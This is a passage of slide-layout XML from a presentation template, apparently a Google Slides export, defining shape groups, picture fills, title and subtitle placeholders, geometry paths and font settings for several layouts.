        <p:spPr>
          <a:xfrm>
            <a:off x="3497250" y="2018672"/>
            <a:ext cx="21495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3" name="Google Shape;683;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969495" y="3604475"/>
            <a:ext cx="21495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4" name="Google Shape;684;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497250" y="3604475"/>
            <a:ext cx="21495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5" name="Google Shape;685;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025005" y="2018672"/>
            <a:ext cx="21495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6" name="Google Shape;686;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025005" y="3604475"/>
            <a:ext cx="21495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7" name="Google Shape;687;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970881" y="1552475"/>
            <a:ext cx="21468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8" name="Google Shape;688;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498636" y="1552475"/>
            <a:ext cx="21468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9" name="Google Shape;689;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6026391" y="1552475"/>
            <a:ext cx="21468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0" name="Google Shape;690;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970881" y="3138276"/>
            <a:ext cx="21468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1" name="Google Shape;691;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498636" y="3138276"/>
            <a:ext cx="21468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2" name="Google Shape;692;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6026391" y="3138276"/>
            <a:ext cx="21468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_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="693" name="Shape 693"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2564774"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144000" cy="2564774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="695" name="Google Shape;695;p27"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="29250"/>
              <a:ext cx="959340" cy="869401"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="696" name="Google Shape;696;p27"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="6429125" y="0"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="697" name="Google Shape;697;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="698" name="Google Shape;698;p27"/>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699" name="Google Shape;699;p27"/>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700" name="Google Shape;700;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="701" name="Google Shape;701;p27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="702" name="Google Shape;702;p27"/>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7"/>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7"/>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7"/>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6" name="Google Shape;706;p27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="707" name="Google Shape;707;p27"/>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7"/>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7"/>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7"/>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11" name="Google Shape;711;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="8687530" y="3395678"/>
            <a:ext cx="204551" cy="1747810"/>
            <a:chOff x="1089587" y="-1610"/>
            <a:chExt cx="204551" cy="1747810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="712" name="Google Shape;712;p27"/>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7"/>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7"/>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7"/>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6" name="Google Shape;716;p2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717" name="Google Shape;717;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726875" y="2018672"/>
            <a:ext cx="22053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8" name="Google Shape;718;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476275" y="2018672"/>
            <a:ext cx="22053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9" name="Google Shape;719;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2101575" y="3604475"/>
            <a:ext cx="22053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0" name="Google Shape;720;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4850975" y="3604475"/>
            <a:ext cx="22053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1" name="Google Shape;721;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6225675" y="2018672"/>
            <a:ext cx="22053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2" name="Google Shape;722;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728297" y="1552475"/>
            <a:ext cx="22020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3" name="Google Shape;723;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477697" y="1552475"/>
            <a:ext cx="22020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4" name="Google Shape;724;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6227097" y="1552475"/>
            <a:ext cx="22020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5" name="Google Shape;725;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102997" y="3138276"/>
            <a:ext cx="22020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6" name="Google Shape;726;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852397" y="3138276"/>
            <a:ext cx="2202000" cy="466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727" name="Shape 727"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="728" name="Google Shape;728;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="729" name="Google Shape;729;p28"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="4015901"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="730" name="Google Shape;730;p28"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="731" name="Google Shape;731;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="732" name="Google Shape;732;p28"/>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733" name="Google Shape;733;p28"/>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734" name="Google Shape;734;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="223258" y="1854600"/>
            <a:ext cx="2475898" cy="3086910"/>
            <a:chOff x="223258" y="1854600"/>
            <a:chExt cx="2475898" cy="3086910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="735" name="Google Shape;735;p28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="736" name="Google Shape;736;p28"/>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8"/>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8"/>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8"/>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0" name="Google Shape;740;p28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="-182085" y="2259943"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="741" name="Google Shape;741;p28"/>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8"/>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8"/>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8"/>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45" name="Google Shape;745;p2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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="747" name="Google Shape;747;p28"/>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8"/>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8"/>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8"/>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8"/>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752" name="Shape 752"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="754" name="Google Shape;754;p29"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="4015901"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="755" name="Google Shape;755;p29"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="756" name="Google Shape;756;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="757" name="Google Shape;757;p29"/>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758" name="Google Shape;758;p29"/>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759" name="Google Shape;759;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="1854600"/>
            <a:ext cx="7212384" cy="3086910"/>
            <a:chOff x="1727190" y="1854600"/>
            <a:chExt cx="7212384" cy="3086910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="760" name="Google Shape;760;p29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="761" name="Google Shape;761;p29"/>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9"/>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9"/>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9"/>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5" name="Google Shape;765;p29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="8372951" y="2259943"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="530766"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="766" name="Google Shape;766;p29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7286403" y="530766"/>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9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6995146" y="530766"/>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9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6703889" y="530766"/>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9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6413465" y="530766"/>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70" name="Google Shape;770;p2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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="771" name="Google Shape;771;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="8694501" y="3286064"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="772" name="Google Shape;772;p29"/>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9"/>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9"/>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9"/>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9"/>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77" name="Shape 777"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="778" name="Google Shape;778;p30"/>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779" name="Google Shape;779;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="37000"/>
          </a:blip>
          <a:srcRect b="35662" l="0" r="38279" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-75050" y="2503675"/>
            <a:ext cx="2714875" cy="2564774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="781" name="Google Shape;781;p30"/>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782" name="Google Shape;782;p30"/>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783" name="Google Shape;783;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="8071376" y="2478542"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="784" name="Google Shape;784;p30"/>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30"/>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30"/>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30"/>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8" name="Google Shape;788;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="227240" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="789" name="Google Shape;789;p30"/>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30"/>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30"/>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30"/>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3" name="Google Shape;793;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="629975"/>
            <a:ext cx="3808500" cy="768900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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atin typeface="Albert Sans Light"/>
                <a:ea typeface="Albert Sans Light"/>
                <a:cs typeface="Albert Sans Light"/>
                <a:sym typeface="Albert Sans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4" name="Google Shape;794;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="1387974"/>
            <a:ext cx="3808500" cy="37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795" name="Google Shape;795;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056006" y="2003879"/>
            <a:ext cx="3808500" cy="768900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>
          </a:solid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atin typeface="Albert Sans Light"/>
                <a:ea typeface="Albert Sans Light"/>
                <a:cs typeface="Albert Sans Light"/>
                <a:sym typeface="Albert Sans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6" name="Google Shape;796;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056006" y="2764450"/>
            <a:ext cx="3808500" cy="37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797" name="Google Shape;797;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="3377783"/>
            <a:ext cx="3808500" cy="768900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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atin typeface="Albert Sans Light"/>
                <a:ea typeface="Albert Sans Light"/>
                <a:cs typeface="Albert Sans Light"/>
                <a:sym typeface="Albert Sans Light"/>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8" name="Google Shape;798;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="4140925"/>
            <a:ext cx="3808500" cy="37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799" name="Google Shape;799;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183778" y="3045177"/>
            <a:ext cx="261257" cy="2098368"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="800" name="Google Shape;800;p30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
